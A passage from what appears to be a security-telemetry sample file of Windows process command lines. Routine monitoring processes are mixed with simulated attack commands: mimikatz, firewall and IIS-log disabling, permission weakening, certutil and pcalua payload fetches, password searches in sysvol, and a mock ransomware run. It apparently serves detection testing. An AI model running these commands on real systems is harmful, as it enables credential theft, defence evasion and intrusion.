State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\".\\\\lsass.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd /c \\\"powershell wscript.shell used to download a .gif\\\"\",\"cacls.exe c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"cmd /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe firewall set opmode mode=disable profile=all\",\"cmd /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe @ abc.com abc.wallet\",\"cmd /c echo /e:vbscript.encode /b\",\"pcalua.exe -a \\\\\\\\server\\\\payload.dll\",\"findstr /si password sysvol *.txt\",\"odbcconf.exe /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe 464 0 0x0110:40\",\"mt.exe port\",\"mt.exe smb\",\"hd.exe -pslist\",\"hd.exe -enum\",\"netsh.exe PortOpenning\",\"certutil -urlcache -split -f http://127.0.0.1/ \",\".\\\\reg add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Service\\\"\",\"sc delete MSTICTestService\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"cmd /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\reg.exe add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32 /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" 